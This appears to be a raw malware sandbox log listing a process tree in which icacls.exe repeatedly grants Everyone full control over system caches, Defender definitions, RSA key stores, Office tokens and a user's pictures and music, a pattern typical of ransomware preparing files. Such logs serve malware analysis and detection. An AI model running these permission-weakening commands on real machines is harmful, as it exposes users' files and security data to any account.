C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07747e05\DMI7DF5.tmp.log.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73B1DD16-5F6E-4703-817D-F411AA517EC7}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{A9642826-38E6-4A6F-A253-1839AB5002E3}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6F95B335-B27B-43AB-99B0-FE819F4F3284}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\CompleteUse.dib /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\CompareCopy.emf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\CompressSync.svg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\CompressSubmit.cr2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\DisableMerge.emf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ConnectInstall.gif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\DisableUnprotect.wmf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ExpandSave.svg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\GroupRestart.wmf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\GroupUndo.dxf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\MountSwitch.raw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\NewUnregister.gif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\OpenInvoke.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\PublishStart.svg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\PushRedo.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RegisterRead.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\RedoHide.ico /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\PushSkip.dwg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ResizeComplete.crw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\ShowLimit.jpeg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\SkipClose.wmf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\SyncSave.emf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UninstallBlock.crw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UnlockConnect.svg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UpdateStop.gif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\WaitConnect.wmf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\UseCopy.gif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\AddSync.vsd /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\AssertStep.wax /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ClearOpen.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ConvertToJoin.pot /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\DebugCompare.cmd /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\DenyInstall.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\DenyRemove.svgz /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\DebugSelect.scf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\BackupExit.3gp2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\GroupRead.rm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\JoinGet.jfif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\EditRestart.cfg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\LockEnable.wmv /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\PingRepair.ppt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\PushFormat.shtml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ReadExit.dwg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ReceiveLimit.ps1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\RegisterPush.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\RenameApprove.avi /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ResetDismount.vdw /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\ResumeExit.aifc /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\SendReceive.mpa /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\SearchFormat.raw /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\TraceWait.css /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\StepRedo.hta /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UpdateFormat.ttc /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Music\UpdateSkip.dot /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q2⤵
-
-
